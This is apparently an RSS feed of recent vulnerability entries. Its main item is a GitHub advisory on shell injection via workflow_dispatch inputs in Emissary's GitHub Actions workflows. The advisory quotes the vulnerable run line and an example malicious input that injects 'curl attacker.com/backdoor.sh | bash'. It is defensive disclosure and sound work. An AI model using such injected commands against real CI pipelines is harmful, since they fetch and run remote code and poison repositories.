<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Thu, 08 Oct 2026 11:29:06 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-281131</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-281131</link>
      <description>EUVD-2026-281131</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-281131</guid>
    </item>
    <item>
      <title>fkie_cve-2026-35580</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-35580</link>
      <description>&lt;p&gt;Emissary is a P2P based data-driven workflow engine. Prior to 8.39.0, GitHub Actions workflow files contained shell injection points where user-controlled workflow_dispatch inputs were interpolated directly into shell commands via ${{ }} expression syntax. An attacker with repository write access could inject arbitrary shell commands, leading to repository poisoning and supply chain compromise affecting all downstream users. This vulnerability is fixed in 8.39.0.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Emissary is a P2P based data-driven workflow engine. Prior to 8.39.0, GitHub Actions workflow files contained shell injection points where user-controlled workflow_dispatch inputs were interpolated directly into shell commands via ${{ }} expression syntax. An attacker with repository write access could inject arbitrary shell commands, leading to repository poisoning and supply chain compromise affecting all downstream users. This vulnerability is fixed in 8.39.0.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-35580</guid>
    </item>
    <item>
      <title>GHSA-3g6g-gq4r-xjm9 — Emissary has GitHub Actions Shell Injection via Workflow Inputs</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-3g6g-gq4r-xjm9</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Maven: gov.nsa.emissary:emissary&lt;/p&gt;
&lt;p&gt;## Summary&lt;/p&gt;
&lt;p&gt;Three GitHub Actions workflow files contained **10 shell injection points** where
user-controlled `workflow_dispatch` inputs were interpolated directly into shell
commands via `${{ }}` expression syntax. An attacker with repository write access
could inject arbitrary shell commands, leading to repository poisoning and supply
chain compromise affecting all downstream users.&lt;/p&gt;
&lt;p&gt;## Affected Files&lt;/p&gt;
&lt;p&gt;| Workflow file                            | Injection points |
|------------------------------------------|------------------|
| `.github/workflows/maven-version.yml`    | 4                |
| `.github/workflows/cherrypick.yml`       | 5                |
| `.github/workflows/maven-release.yml`    | 1                |&lt;/p&gt;
&lt;p&gt;## Details&lt;/p&gt;
&lt;p&gt;GitHub Actions `${{ }}` expressions inside `run:` blocks are substituted **before**
the shell interprets the command. When a `workflow_dispatch` input is placed directly
in a `run:` block, an attacker who can trigger the workflow can break out of the
intended command and execute arbitrary code.&lt;/p&gt;
&lt;p&gt;### Example — `maven-version.yml` (before fix)&lt;/p&gt;
&lt;p&gt;```yaml
- name: Set the name of the branch
  run: echo &amp;#34;PR_BRANCH=action/${{ github.event.inputs.next_version }}&amp;#34; &amp;gt;&amp;gt; &amp;#34;$GITHUB_ENV&amp;#34;
```&lt;/p&gt;
&lt;p&gt;A malicious input such as `1.0.0&amp;#34;; curl attacker.com/backdoor.sh | bash; echo &amp;#34;`
would be interpolated directly into the shell, executing arbitrary commands with
the job&amp;#39;s `GITHUB_TOKEN` permissions (`contents: write`, `pull-requests: write`).&lt;/p&gt;
&lt;p&gt;### Impact&lt;/p&gt;
&lt;p&gt;- Arbitrary code exe…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Maven: gov.nsa.emissary:emissary&lt;/p&gt;
&lt;p&gt;## Summary&lt;/p&gt;
&lt;p&gt;Three GitHub Actions workflow files contained **10 shell injection points** where
user-controlled `workflow_dispatch` inputs were interpolated directly into shell
commands via `${{ }}` expression syntax. An attacker with repository write access
could inject arbitrary shell commands, leading to repository poisoning and supply
chain compromise affecting all downstream users.&lt;/p&gt;
&lt;p&gt;## Affected Files&lt;/p&gt;
&lt;p&gt;| Workflow file                            | Injection points |
|------------------------------------------|------------------|
| `.github/workflows/maven-version.yml`    | 4                |
| `.github/workflows/cherrypick.yml`       | 5                |
| `.github/workflows/maven-release.yml`    | 1                |&lt;/p&gt;
&lt;p&gt;## Details&lt;/p&gt;
&lt;p&gt;GitHub Actions `${{ }}` expressions inside `run:` blocks are substituted **before**
the shell interprets the command. When a `workflow_dispatch` input is placed directly
in a `run:` block, an attacker who can trigger the workflow can break out of the
intended command and execute arbitrary code.&lt;/p&gt;
&lt;p&gt;### Example — `maven-version.yml` (before fix)&lt;/p&gt;
&lt;p&gt;```yaml
- name: Set the name of the branch
  run: echo &amp;#34;PR_BRANCH=action/${{ github.event.inputs.next_version }}&amp;#34; &amp;gt;&amp;gt; &amp;#34;$GITHUB_ENV&amp;#34;
```&lt;/p&gt;
&lt;p&gt;A malicious input such as `1.0.0&amp;#34;; curl attacker.com/backdoor.sh | bash; echo &amp;#34;`
would be interpolated directly into the shell, executing arbitrary commands with
the job&amp;#39;s `GITHUB_TOKEN` permissions (`contents: write`, `pull-requests: write`).&lt;/p&gt;
&lt;p&gt;### Impact&lt;/p&gt;
&lt;p&gt;- Arbitrary code exe…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-3g6g-gq4r-xjm9</guid>
    </item>
    <item>
      <title>openSUSE-SU-2026:10540-1 — Botan-3.11.1-1.1 on GA media</title>
      <link>https://cve.radiocsirt.org/vuln/opensuse-su-2026:10540-1</link>
      <description>&lt;p&gt;Botan-3.11.1-1.1 on GA media&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Botan-3.11.1-1.1 on GA media&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/opensuse-su-2026:10540-1</guid>
    </item>
    <item>
      <title>UBUNTU-CVE-2026-35580</title>
      <link>https://cve.radiocsirt.org/vuln/ubuntu-cve-2026-35580</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Ubuntu:25.10: botan3&lt;/p&gt;
&lt;p&gt;[Unknown description]&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Ubuntu:25.10: botan3&lt;/p&gt;
&lt;p&gt;[Unknown description]&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ubuntu-cve-2026-35580</guid>
    </item>
  </channel>
</rss>
